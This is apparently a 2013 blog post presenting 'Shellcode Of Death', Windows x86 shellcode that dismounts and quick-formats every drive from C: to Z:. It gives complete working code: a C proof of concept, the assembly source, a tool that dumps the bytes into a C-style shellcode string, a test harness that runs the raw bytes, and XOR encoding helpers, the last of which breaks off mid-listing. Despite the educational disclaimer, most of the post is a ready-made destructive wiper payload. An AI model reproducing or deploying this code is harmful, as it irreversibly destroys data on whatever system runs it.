Shellcode Of Death
Author:
Ashfaq Ansari

Reviewed by:
Rating:
4
On April 8, 2013
Last modified:April 8, 2013

Summary:

ShellcodeOfDeath is a simple shellcode that tries to format all the available Windows drive. This shellcode has been designed for education purpose only. Users are requested not to try this shellcode on a production system. However, you may test it in lab environment.

Introduction

 

Recently, I had been working on a shellcode project that we named as “Shellcode Of Death“. “Shellcode of Death” is designed to run on Windows x86 platforms like Windows XP/Vista/7/8/Server 2003/2008.
 

What this shellcode does?
 

ShellcodeOfDeath Logo
 

Well, this shellcode has been designed to format all the available drive on Windows. Weird? Huh!!!

Yes, I know you may be thinking this is weird and why to develop such a shellcode. So, please read and abide by the Disclaimer.
 

Disclaimer: This shellcode is developed for educational purpose only. The author is not and will not hold any responsibility for any illegal or unauthorized use of #ShellcodeOfDeath. Any use of this shellcode is at the reader’s own risk.

I request you not to try this shellcode on a production system. However, you are free to experiment with this shellcode in lab environment.
 

How the journey to Shellcode Of Death begun?

 

Well few months earlier, I was trying to write such a shellcode that can format all the Windows drive. So, my first step was to try to write a C program that can do the same.

I started researching on such C codes that can format the drive not by using command prompt in any way but by using Windows API.

For few days, I was searching for any documented Windows API’s that has the capability to format drive. But unfortunately, Microsoft does not provide any documented API that can format the drive (as far as I have searched).

I had lost hope to found such a Windows API that can help in formatting the drives. Guess what happened next?
 

Turning point – Undocumented API found – FormatEx()

 

Luckily, one day I found a clue.

Mark Russinovich (Systems Internalshttp://www.sysinternals.com) has exposed a undocumented Windows API that can format the Windows drive efficiently. Exactly the thing that I was looking for.

FormatEx – Windows API structure
 

1
2
3
4
5
6
7
8
9
VOID NTAPI
FormatEx(
    IN PWCHAR DriveRoot,
    IN FMIFS_MEDIA_FLAG MediaFlag,
    IN PWCHAR Format,
    IN PWCHAR Label,
    IN BOOLEAN QuickFormat,
    IN ULONG ClusterSize,
    IN PFMIFSCALLBACK Callback)

 

After researching on FormatEx, we started to write Poof Of Concept code in C.
 

Writing Shellcode Of Death PoC in C

 

Filename: ShellcoddeOfDeath.c
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
#include <windows.h>
#include <WinIoCtl.h>
#define _UNICODE 1

/*
                  _     __             _____                    
  /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
 / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \
/ __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
                           |___/                                

                                http://hacksys.vfreaks.com/
                                  hacksysteam@hotmail.com

Author:
       
    Ashfaq Ansari
    hacksysteam@hotmail.com
   
Thanks:

    Mark Russinovich (Systems Internals - http://www.sysinternals.com)

Module Name:
   
    Shellcode Of Death

Abstract:
   
    This is a proof of concept shellcode in C format.

IDE:
     
    Dev-C++ 4.9.9.2 (Windows XP SP3)
       
Compiler:
         
    gcc 3.4.2

*/


typedef enum {
    PROGRESS,
    DONEWITHSTRUCTURE,
    UNKNOWN2,
    UNKNOWN3,
    UNKNOWN4,
    UNKNOWN5,
    INSUFFICIENTRIGHTS,
    UNKNOWN7,
    VOLUME_IN_USE,
    CANT_QUICK_FORMAT,
    UNKNOWNA,
    DONE,
    UNKNOWNC,
    UNKNOWND,
    OUTPUT,
    STRUCTUREPROGRESS
} CALLBACKCOMMAND;

typedef BOOLEAN (__stdcall *PFMIFSCALLBACK)( CALLBACKCOMMAND Command,
                                             DWORD SubAction,
                                             PVOID ActionInfo );

typedef VOID (__stdcall *PFORMATEX)( PWCHAR DriveRoot,
                                     DWORD MediaFlag,
                                     PWCHAR Format,
                                     PWCHAR Label,
                                     BOOL QuickFormat,
                                     DWORD ClusterSize,
                                     PFMIFSCALLBACK Callback );

PFORMATEX   FormatEx;

BOOLEAN __stdcall FormatExCallback( CALLBACKCOMMAND Command,
                                    DWORD Modifier,
                                    PVOID Argument )
{
    return TRUE;
}


int main( )
{
    int i;
    int res;
    char szVolumeAccessPath[] = "\\\\.\\X:";
    DWORD dwRet;
    HANDLE hVolRead;
    PWCHAR DriveList[] = {L"C:", L"D:", L"E:", L"F:", L"G:", L"H:", L"I:",
                          L"J:", L"K:", L"L:", L"M:", L"N:", L"O:", L"P:",
                          L"Q:", L"R:", L"S:", L"T:", L"U:", L"V:", L"W:",
                          L"X:", L"Y:", L"Z:"};
    WCHAR  RootDirectory[MAX_PATH];

    LoadLibrary( "fmifs.dll" );
    FormatEx = (void *) GetProcAddress(GetModuleHandle("fmifs.dll"),
                                       "FormatEx");

    for ( i = 0; i <= 23; i++){

        wcscpy( RootDirectory,DriveList[i] );  
        RootDirectory[2] = L'\\';
        RootDirectory[3] = (WCHAR) 0;
        szVolumeAccessPath[4] = RootDirectory[0];
       
        //Get the handle to the drive
        hVolRead = CreateFile(szVolumeAccessPath,
                              GENERIC_READ | GENERIC_WRITE,
                              FILE_SHARE_READ | FILE_SHARE_WRITE,
                              NULL,
                              OPEN_EXISTING,
                              0,
                              NULL);
       
        // dismount the file system
        // no need to lock the volume
        // once dismounted all the handles will be invalid
        res = DeviceIoControl(hVolRead,
                              FSCTL_DISMOUNT_VOLUME,
                              NULL,
                              0,
                              NULL,
                              0,
                              &dwRet,
                              NULL);
       
        // Close the handle
        CloseHandle(hVolRead);
       
        //Format the drive
        //Proceed to next drive if error occurs
        FormatEx(RootDirectory,
                 0xC,
                 L"NTFS",
                 L"PwNeD - HackSys Team",
                 TRUE,
                 4096,
                 FormatExCallback );
       
        Sleep(200);
    }
    return 0;
}

 

Warning: Please do not copy the code from the web page and compile it. There might be issues with the code due to Code rendering style in WordPress, as it strips away double slashes and other things. All the codes used while developing this shellcode is available for download, use them for your research.

 

Testing the ShellcodeOfDeath executable

 

Shellcode Of Death PoC in C

Yeah! it’s working like a charm!!
 

Writing Shellcode Of Death in assembly language

 

I did like to extend my heartiest thanks to my friend Ruei-Min Jiang a.k.a MicroMike (http://mike820324.blogspot.in/) for helping me in writing assembly version of Shellcode Of Death.

Thanks bro, without your help this would not have been possible.

So, to write the dynamic shellcode in Assembly, you will need a Hash Calculator to calculate function hashes.
 

Filename: HashCalculator.cpp
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#include <stdio.h>
#include <stdlib.h>

/*
                  _     __             _____                    
  /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
 / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \
/ __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
                           |___/                                

                                http://hacksys.vfreaks.com/
                                  hacksysteam@hotmail.com

Thanks to:
       
    Ruei-Min Jiang (@mike820324) a.k.a MicroMike
    respect to you bro.

Module Name:

    Hash Calculator

Abstract:
   
    This function calculates the Function hash according
    to its name.

IDE:
     
    Dev-C++ 4.9.9.2 (Windows XP SP3)
       
Compiler:
         
    gcc 3.4.2

*/


unsigned int hash_function(const char* string){
         unsigned int value = 0;
         __asm__("xor %%ebx, %%ebx;\n\t\
                 loop:\n\t\
                 xor %%eax, %%eax;\n\t\
                 lodsb;\n\t\
                 rol $5, %%ebx;\n\t\
                 addl %%eax, %%ebx;\n\t\
                 cmp $0, %%eax;\n\t\
                 jnz loop;\n\t\
                 ror $5, %%ebx;\n\t\
                 movl %%ebx, %0;\n\t"

                  :"=m" (value)
                  :"S" (string)
                  :
                  );
         printf("%s: 0x%x\n",string,value);
}

int main(){  
    hash_function("LoadLibraryA");
    hash_function("CloseHandle");
    hash_function("CreateFileA");
    hash_function("ExitProcess");
    hash_function("FormatEx");
    hash_function("DeviceIoControl");
    hash_function("Sleep");
    system("pause");   
}

 

Warning: Please do not copy the code from the web page and compile it. All the codes used while developing this shellcode is available for download, use them for your research.

 

Now, we present you Shellcode Of Death in Assembly.
 

Filename: ShellcodeOfDeath.s
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
/*
 *                      _     __             _____                    
 *      /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
 *     / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \
 *    / __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
 *    \/ /_/ \__,_|\___|_|\_\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
 *                               |___/                                
 *                                    http://hacksys.vfreaks.com/
 *                                      hacksysteam@hotmail.com
 *
 *                       Shellcode Of Death
 *                                        v1.0
 *  
 *          Ruei-Min Jiang (@mike820324) a.k.a MicroMike
 *          Ashfaq Ansari (ashfaq_ansari1989@hotmail.com)
 *
 * Still a lot can be done to improve this shellcode. This is the first release.
 * Further, a lot of improvement and optimization can be done to this shellcode.
 * Any bugs, suggestions or contribution is most welcomed.
 *
 * Lenth of shellcode: 387 bytes
 * Number of NULL byte: 49
 *
 * Notes: There are more NULL bytes due to a fact that few of the Windows API used
 *        accepts input in UNICODE format. Still, NULL bytes can be reduces further.
 *        We can use any simple encoder to xor encode the shellcode and eventually
 *        eliminate NULL bytes.
 *               
 * Things to do:
 *              1. Code cleanup
 *              2. Optimization
 *              3. Minification
 *              4. Add suggestions
 */
.globl _main

_main:
                   jmp start_shell;                
/*
 * %edx store the base address of kernel32.dll (input)
 * %ebx points to the start of symbal name table (input)
 * %ecx contains the destination hash value (input)
 * %eax is the index_counter (output)
 */
 hash_function:
                   xorl %eax,%eax;
    next_entry:
                   mov (%ebx,%eax,4), %esi;
                   addl %edx, %esi;
                   push %ebx;
                   push %eax;
                   xor %ebx, %ebx;
    continue_hash:
                   xor %eax, %eax;
                   lodsb;
                   rol $5, %ebx;
                   addl %eax, %ebx;
                   cmp $0, %eax;
                   jnz continue_hash;
                   ror $5, %ebx;
                   cmp %ecx, %ebx;
                   pop %eax;
                   pop %ebx;
                   je hash_finish;
                   inc %eax;
                   jmp next_entry;
    hash_finish:
                   ret;
                   
/*
 * input:
 *       set %edx to the dll base address
 *       set %ecx as the hash value you want to compare
 * output:
 *       %eax is the API address
 */
get_address:
    PE_init:
                   movl %edx, %eax;
                   movl 0x3c(%eax), %eax;
                   movl 0x78(%edx, %eax), %eax;
                   leal (%edx, %eax), %eax;
                   pushl %eax;
                   movl 0x20(%eax), %eax;
                   leal (%edx, %eax), %ebx;
                   call hash_function;
   
                   popl %ebx;
                   movl 0x24(%ebx), %ecx;
                   leal (%edx, %ecx), %ecx;
                   movw (%ecx, %eax, 2), %ax;
                   andl $0x0000ffff, %eax;

                   movl 0x1c(%ebx), %ebx;
                   leal (%edx, %ebx), %ebx;
                   movl (%ebx, %eax, 4), %eax;
                   leal (%edx, %eax), %eax;
                   ret;    
/*
 * hash value for each API
 * LoadLibraryA = 0x331adddc
 * CloseHandle = 0xd7629096
 * CreateFileA = 0xcfb0e506
 * ExitProcess = 0xec468f87
 * Sleep = 0x567a110
 * DeviceIOControl = 0x3b34d4a7
 * --------------fmifs.dll---------------
 * FormatEx = 0xab025b64
 */  
start_shell:
    set_Kernel32_env:
                 xorl %ecx, %ecx
                 movl %fs:0x30, %eax;
                 movl 0xc(%eax), %eax;
                 movl 0x1c(%eax), %eax;              
    next_module:
                 movl 0x8(%eax), %edx;
                 movl 0x20(%eax), %edi;
                 movl (%eax), %eax;
                 cmp 0x18(%edi), %cl;
                 jne next_module;
                 
    set_hash_table:
                 pushl $0xab025b64;
                 pushl $0x0567a110;
                 pushl $0x3b34d4a7;
                 pushl $0xd7629096;
                 pushl $0xec468f87;
                 pushl $0xcfb0e506;
                 pushl $0x331adddc;
                 movl %esp, %ebp;
    end_hash_table:
    set_api_table:
    init_variable:
                 pushl $7;
                 popl %ecx;
                 xorl %edi, %edi;
    loop_start:
                 cmp $1, %ecx;
                 jne set_kernel32_api;
    set_fmifs_env:
                 pushl %ecx;
                 jmp data_string;
                 back_to_here:
    restore_loadlibrary:
                 movl 0x1c(%esp), %eax;
                 call *%eax;
                 movl %eax, %edx;
                 popl %ecx;
    set_kernel32_api:
                 pushl %ecx;
                 movl (%ebp, %edi, 4), %ecx;
                 call get_address;
                 popl %ecx;
                 pushl %eax;
                 inc %edi;
                 loop loop_start;
                 movl %esp, %ebp;
                 jmp start_main_code;
    data_string:
                 call back_to_here;
                 .string "fmifs.dll";    
                 
start_main_code:
    Get_string_addr:
                 jmp 2f;
                 1:;
                 popl %esi;
    Format_start_loop:
                 pushl $23;
                 popl %ecx;                              
    format_loop_start:               
                 movl %ecx, %edi;
   
    CreateFile_call:
                 xorl %edx, %edx;
                 pushl %edx;
                 pushl %edx;
                 pushl $3;
                 pushl %edx;
                 pushl $3;
                 pushl $0xc0000000;
                 pushl %esi;
                 movl 0x14(%ebp), %ebx;
                 call *%ebx;
    Store_File_Handle:
                 pushl %eax;
                 subl $0x4, %esp;
                 xorl %edx, %edx;
    DeviceIOControl_call:
                 pushl %edx;
                 leal 0x4(%esp), %ebx
                 pushl %ebx;
                 pushl %edx;
                 pushl %edx;
                 pushl %edx;
                 pushl %edx;
                 pushl $0x90020;
                 pushl %eax;
                 movl 0x8(%ebp), %ebx
                 call *%ebx;
    close_file_handle:
                 pushl 0x4(%esp);
                 movl 0xc(%ebp), %ebx;
                 call *%ebx;
   
    FormatEx_call:
                 leal call_back-string_start(%esi),%eax;
                 pushl %eax;
                 pushl $4096;
                 pushl $1;
                 leal volume_label-string_start(%esi), %eax;
                 pushl %eax;
                 leal string2_start-string_start(%esi), %eax;
                 pushl %eax;
                 pushl $0xc;
                 leal 0x8(%esi), %eax;
                 pushl %eax;
                 movl (%ebp), %ebx;
                 call *%ebx;
    sleep_call:
                 pushl $200;
                 movl 0x4(%ebp), %ebx
                 call *%ebx;    
    loop_end:
                 movl %edi, %ecx
                 addl $1, 0x8(%esi);
                 loop format_loop_start;
   
    exit_process:
                 push $0;
                 movl 0x10(%ebp), %ebx;
                 call *%ebx;
    2:;
                 call 1b;
    string_start:
                 .byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00
    string2_start:
                 .byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00
    /*
     * Volume Label
     * Set the name of the Volume label
     * after formatting the respective volume.
     * Modify volume_label as you desire.
     * Deafult value -- PwNeD
     */
    volume_label:
                 .byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00
    call_back:
                push %ebp;
                movl %esp, %ebp;
                xorl %eax, %eax;
                inc %eax;
                pop %ebp;
                ret $0xc;

 

Warning: Please do not copy the code from the web page and compile it. All the codes used while developing this shellcode is available for download, use them for your research.

 

Obtaining the final Shellcode Of Death

 

Now to obtain final shellcode, we will have to compile the ShellcodeOfDeath.s and extract the shellcode by dumping the .text secion of the object file.
 

Filename: DumpShellcode.c
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
/*
                  _     __             _____                    
  /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
 / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \
/ __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
                           |___/                                

                                http://hacksys.vfreaks.com/
                                  hacksysteam@hotmail.com

Module Name:

    Dump Shellcode In C Style

Abstract:
   
    A simple program that will generate shellcode from source file.
    Using pure assembly is prefered.
    the binary path of gcc and objcopy must add to the windows environment.
    This code is only work for windows platform not linux. ;)
    by MicroMike
   
    Fixed by Ashfaq Ansari
   
IDE:
     
    Dev-C++ 4.9.9.2 (Windows XP SP3)
       
Compiler:
         
    gcc 3.4.2

*/


#include <stdio.h>
#include <stdlib.h>

void create_obj_file(const char *filename){
    char command[100];
    sprintf(command, "gcc -c -o temp.o %s", filename);
    system(command);
    /* strip the trash section such as debug */
    //system("objcopy --strip-debug --strip-unneeded temp.o");
    system("objcopy --strip-all temp.o");
}

void dump_shellcode(FILE *optr){
    unsigned int loop, counter=1, ch=1, nop_counter=0, null_counter=0;
    unsigned char header[20];
    unsigned short *SectionNum;
    int buffer;
    unsigned char str_to_write[50];
    FILE *iptr;
    iptr = fopen("temp.o", "rb");
    if(iptr == NULL){
        printf("Can not open file, is the file name correct??\n");
        exit(1);
    }
    /* reading header */
    for(loop=0; loop<20; loop++){
        header[loop] = fgetc(iptr);
    }
    /* This is the field I care for ~~ */
    /* this value should only be one, only has .text section */
    SectionNum = (unsigned short*)&(header[2]);
   
    /* each section header has 40 bytes*/
    fseek(iptr, 40*(*SectionNum), SEEK_CUR);
   
    /* the following is just some file operations */
    fputs("unsigned char *shellcode=\n\"", optr);
   
    printf("\nExtracting the shellcode:\n\n");
   
    printf("unsigned char *shellcode=\n\"");
   
    while(ch != feof(iptr)){

             memset(str_to_write, 0, 50);
             buffer = fgetc(iptr);
                 
             /* GCC issue on Windows:
                    Why does GCC pad functions with NOPs?
                    http://stackoverflow.com/questions/7912464/why-does-gcc-pad-functions-with-nops    
              */

              if(buffer == 0x90){
                        nop_counter++;
                        }
              if(nop_counter > 1){
                             break;
                             }          
              /* Null byte counter */              
              if(buffer == 0x00){
                        null_counter++;
                        }              
              sprintf(str_to_write, "\\x%02x", buffer);
              printf("%s", str_to_write);
              fputs(str_to_write, optr);
              if(counter++ > 10){
                           printf("\"\n\"");
                           fputs("\"\n\"",optr);
                           counter = 1;
                           }
              ch++;
              }

    printf("\"\n");
    fputs("\"\n", optr);
    printf("\nLength of Shellcode: %d", ch-1);
    printf("\nNumber of NULL's: %d\n", null_counter);
    fclose(iptr);
}

int main(int argc, char **argv){
    FILE *optr;
    if(argc < 2){
        printf("\nUsage: DumpShellcode.exe <Source assembly file> <Output dump file>\n");
        exit(1);
    }  
    create_obj_file(argv[1]);
   
    optr = fopen(argv[2], "w");
    if(optr == NULL){
        printf("Can not create new file: %s", argv[2]);
        exit(1);
    }
    dump_shellcode(optr);
    fclose(optr);
    system("del temp.o");
   
}

 

Warning: Please do not copy the code from the web page and compile it. All the codes used while developing this shellcode is available for download, use them for your research.

Note: DumShellcode.c is developed for Windows Operating System. To make this program work, you will have to set Environment vairables and path. Please enter the path where objdump and gcc utility is installed. For my case it’s “C:\Dev-Cpp\bin\” as I’m using Bloodshed DEV C++ as my IDE.

Setting Environment Path Variable


 

Dump Shellcode
 

Testing final shellcode

 

Now, we have obtained our shellcode. The next thing to do is to check if it’s working as expected. Here we go.
 

Filename: ShellcodeTestUnEncoded.c
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#include <stdio.h>
#include <string.h>

/*
                  _     __             _____                    
  /\  /\__ _  ___| | __/ _\_   _ ___  /__   \___  __ _ _ __ ___  
 / /_/ / _` |/ __| |/ /\ \| | | / __|   / /\/ _ \/ _` | '_ ` _ \
/ __  / (_| | (__|   < _\ \ |_| \__ \  / / |  __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/  \/   \___|\__,_|_| |_| |_|
                           |___/                                

                                http://hacksys.vfreaks.com/
                                  hacksysteam@hotmail.com

Module Name:

    Shellcode Test Encoded

Abstract:
   
    This program is used as a template to test
    C style formatted shellcodes. A decoder is
    already added to the final shellcode output.
   
IDE:
     
    Dev-C++ 4.9.9.2 (Windows XP SP3)
       
Compiler:
         
    gcc 3.4.2

*/


unsigned char shellcode[] =
"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50"
"\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83"
"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b"
"\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c"
"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20"
"\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b"
"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff"
"\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83"
"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00"
"\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b"
"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64"
"\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4"
"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46"
"\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33"
"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89"
"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff"
"\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8"
"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64"
"\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf"
"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00"
"\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83"
"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52"
"\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d"
"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff"
"\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10"
"\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50"
"\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46"
"\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00"
"\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8"
"\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c"
"\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00"
"\x54\x00\x46\x00\x53\x00\x00\x00"
// Volume Label. You may want to change this.
// Default: PwNeD
"\x50\x00\x77\x00\x4e\x00\x65\x00\x44\x00"
// Volume Label End
"\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00";


main()
{

    int i, badchar_c = 0;
   
    printf("\n\nShellcode Length: %d\n", sizeof(shellcode)-1);
   
    for(i = 0; i < sizeof(shellcode)-1; ++i) {
          if(((unsigned char *)shellcode)[i] == 0x00) {
                        badchar_c = badchar_c + 1;
          }
    }
    printf("\nNumber of badchar: %d\n\n", badchar_c);
   
    printf("\nPress any key to execute shellcode....\n\n");

    getch();

    int (*ret)() = (int(*)())shellcode;

    ret();

}

 

Warning: Please do not copy the code from the web page and compile it. All the codes used while developing this shellcode is available for download, use them for your research.

 

Below given are few details of the shellcode:
 

Size of the shellcode: 393 bytes
Number of NULL bytes : 54
 

Before running the shellcode:
Shellcode Of Death Uncoded Shellcode Testing
 

After running the shellcode:
After running Shellcode Of Death

Woo!! Hoo!! Fantastic!!
 

Dilemma of NULL bytes

 

One thing that worried me much is that the shellcode has many NULL bytes. Let me tell you the reason. The Windows API that we have used in this shellcode accepts input in UNICODE format. Hence, we are struggling with a lot of NULL bytes.
 

However, we should not be worried much as these NULL bytes can be completely eliminated by using any simple shellcode encoder. Yes, we can use Metasploit’s encoders to encode our shellcode and eliminate the bad characters.
 

Let’s keep Metasploit encoders aside for a while. I did like to show you a simple XOR Encoder proposed by Vivek Ramachandran (founder of SecurityTube.NET)

Link: http://www.securitytube.net/tags/hod
 

Filename: XOREncodeDecode.py
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
global _start

section .text

_start:

/*
 * Modify this
 * Push shellcode on the stack
 */
push 0x41424344

mov esi, esp
xor ecx, ecx

/*
 * Modify this
 * Length of the shellcode
 */
mov cl, 20

mov ebx, 0xaaaaaaaa

/*
 * Decoder stub
 */
decoder:

        xor dword [esi], ebx
        add esi, 4
        loop decoder

    /*
     * Jump to decoded shellcode
     */    
        jmp esp

 

Filename: XOREncodeDecode.py
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/usr/bin/env python

# XOR Encoder With Decoder Stub
#
# Thanks to: Vivek Ramachandran (SecurityTube.NET)
# Tweaked by: Ashfaq Ansari (HackSys Team)
#
#   HackSys Team - Panthera
# http://hacksys.vfreaks.com/
#   hacksysteam@hotmail.com

import sys

# Paste the shellcode that you want to encode
c_style_shellcode = ("\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50"
"\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83"
"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b"
"\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c"
"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20"
"\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b"
"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff"
"\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83"
"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00"
"\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b"
"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64"
"\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4"
"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46"
"\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33"
"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89"
"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff"
"\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8"
"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64"
"\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf"
"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00"
"\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83"
"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52"
"\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d"
